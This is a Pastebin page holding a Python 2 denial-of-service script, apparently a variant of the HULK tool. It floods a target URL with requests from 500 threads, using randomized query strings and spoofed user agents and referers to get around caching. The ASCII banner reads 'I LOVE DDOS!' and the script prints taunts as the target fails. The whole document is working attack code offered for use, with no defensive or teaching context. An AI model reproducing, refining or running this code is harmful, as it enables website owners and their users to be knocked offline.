Advertisement
Anarchy_Ghost

Illumfuck.py

Jan 20th, 2016
724
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 5.50 KB | None | 0 0
  1. import urllib2
  2. import sys
  3. import threading
  4. import random
  5. import re
  6.  
  7. #global params
  8. url=''
  9. host=''
  10. headers_useragents=[]
  11. headers_referers=[]
  12. request_counter=0
  13. flag=0
  14. safe=0
  15.  
  16. def inc_counter():
  17.     global request_counter
  18.     request_counter+=1
  19.  
  20. def set_flag(val):
  21.     global flag
  22.     flag=val
  23.  
  24. def set_safe():
  25.     global safe
  26.     safe=1
  27.    
  28. # generates a user agent array
  29. def useragent_list():
  30.     global headers_useragents
  31.     headers_useragents.append('Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) BlackHawk/1.0.195.0 Chrome/127.0.0.1 Safari/62439616.534')
  32.     headers_useragents.append('Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)')
  33.     headers_useragents.append('Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)')
  34.     headers_useragents.append('Mozilla/5.0 (PlayStation 4 1.52) AppleWebKit/536.26 (KHTML, like Gecko)')
  35.     headers_useragents.append('Mozilla/5.0 (Windows NT 6.1; rv:26.0) Gecko/20100101 Firefox/26.0 IceDragon/26.0.0.2')
  36.     headers_useragents.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)')
  37.     headers_useragents.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)')
  38.     headers_useragents.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)')
  39.     headers_useragents.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 2.0.50727; InfoPath.2)')
  40.     headers_useragents.append('Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)')
  41.     headers_useragents.append('Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)')
  42.     headers_useragents.append('Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51')
  43.     return(headers_useragents)
  44.  
  45. # generates a referer array
  46. def referer_list():
  47.     global headers_referers
  48.     headers_referers.append('http://www.google.com/?q=')
  49.     headers_referers.append('http://www.usatoday.com/search/results?q=')
  50.     headers_referers.append('http://engadget.search.aol.com/search?q=')
  51.     headers_referers.append('http://' + host + '/')
  52.     return(headers_referers)
  53.    
  54. #builds random ascii string
  55. def buildblock(size):
  56.     out_str = ''
  57.     for i in range(0, size):
  58.         a = random.randint(65, 90)
  59.         out_str += chr(a)
  60.     return(out_str)
  61.  
  62. def usage():
  63.     print 'Illumfuck.py ( URL )'
  64.     print "\a"
  65. print \
  66. """                        .
  67.             ,----------------,              ,---------,
  68.        ,-----------------------,          ,"        ,"|
  69.      ,"                      ,"|        ,"        ,"  |
  70.     +-----------------------+  |      ,"        ,"    |
  71.     |  .-----------------.  |  |     +---------+      |
  72.     |  |                 |  |  |     | -==----'|      |
  73.     |  |  I LOVE DDOS!   |  |  |     |         |      |
  74.     |  |  Bad command or |  |  |/----|`---=    |      |
  75.     |  |  C:\>_Plastyne  |  |  |   ,/|==== ooo |      ;
  76.     |  |                 |  |  |  // |(((( [33]|    ,"
  77.     |  `-----------------'  |," .;'| |((((     |  ,"
  78.     +-----------------------+  ;;  | |         |,"
  79.        /_)______________(_/  //'   | +---------+
  80.   ___________________________/___  `,
  81.  /  oooooooooooooooo  .o.  oooo /,   \,"-----------
  82. / ==ooooooooooooooo==.o.  ooo= //   ,`\--{)B     ,"
  83. /_==__==========__==_ooo__ooo=_/'   /___________,"
  84.  
  85. """
  86. print '---------------------------------------------------'
  87.  
  88.    
  89. #http request
  90. def httpcall(url):
  91.     useragent_list()
  92.     referer_list()
  93.     code=0
  94.     if url.count("?")>0:
  95.         param_joiner="&"
  96.     else:
  97.         param_joiner="?"
  98.     request = urllib2.Request(url + param_joiner + buildblock(random.randint(3,10)) + '=' + buildblock(random.randint(3,10)))
  99.     request.add_header('User-Agent', random.choice(headers_useragents))
  100.     request.add_header('Cache-Control', 'no-cache')
  101.     request.add_header('Accept-Charset', 'ISO-8859-1,utf-8;q=0.7,*;q=0.7')
  102.     request.add_header('Referer', random.choice(headers_referers) + buildblock(random.randint(5,10)))
  103.     request.add_header('Keep-Alive', random.randint(110,120))
  104.     request.add_header('Connection', 'keep-alive')
  105.     request.add_header('Host',host)
  106.     try:
  107.             urllib2.urlopen(request)
  108.     except urllib2.HTTPError, e:
  109.             #print e.code
  110.             set_flag(1)
  111.             print '[+] --> never arrived at my feet, I die! <-- [+]'
  112.             code=500
  113.     except urllib2.URLError, e:
  114.             #print e.reason
  115.             sys.exit()
  116.     else:
  117.             inc_counter()
  118.             urllib2.urlopen(request)
  119.     return(code)       
  120.  
  121.    
  122. #http caller thread
  123. class HTTPThread(threading.Thread):
  124.     def run(self):
  125.         try:
  126.             while flag<2:
  127.                 code=httpcall(url)
  128.                 if (code==500) & (safe==1):
  129.                     set_flag(2)
  130.         except Exception, ex:
  131.             pass
  132.  
  133. # monitors http threads and counts requests
  134. class MonitorThread(threading.Thread):
  135.     def run(self):
  136.         previous=request_counter
  137.         while flag==0:
  138.             if (previous+100<request_counter) & (previous<>request_counter):
  139.                 print "%d :( fucking down :)" % (request_counter)
  140.                 previous=request_counter
  141.         if flag==2:
  142.             print "\n -fall and not get up"
  143.  
  144. #execute
  145. if len(sys.argv) < 2:
  146.     usage()
  147.     sys.exit()
  148. else:
  149.     if sys.argv[1]=="help":
  150.         usage()
  151.         sys.exit()
  152.     else:
  153.         print "copyright: Russian Hackers"
  154.         if len(sys.argv)== 3:
  155.             if sys.argv[2]=="safe":
  156.                 set_safe()
  157.         url = sys.argv[1]
  158.         if url.count("/")==2:
  159.             url = url + "/"
  160.         m = re.search('http\://([^/]*)/?.*', url)
  161.         host = m.group(1)
  162.         for i in range(500):
  163.             t = HTTPThread()
  164.             t.start()
  165.         t = MonitorThread()
  166.         t.start()
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement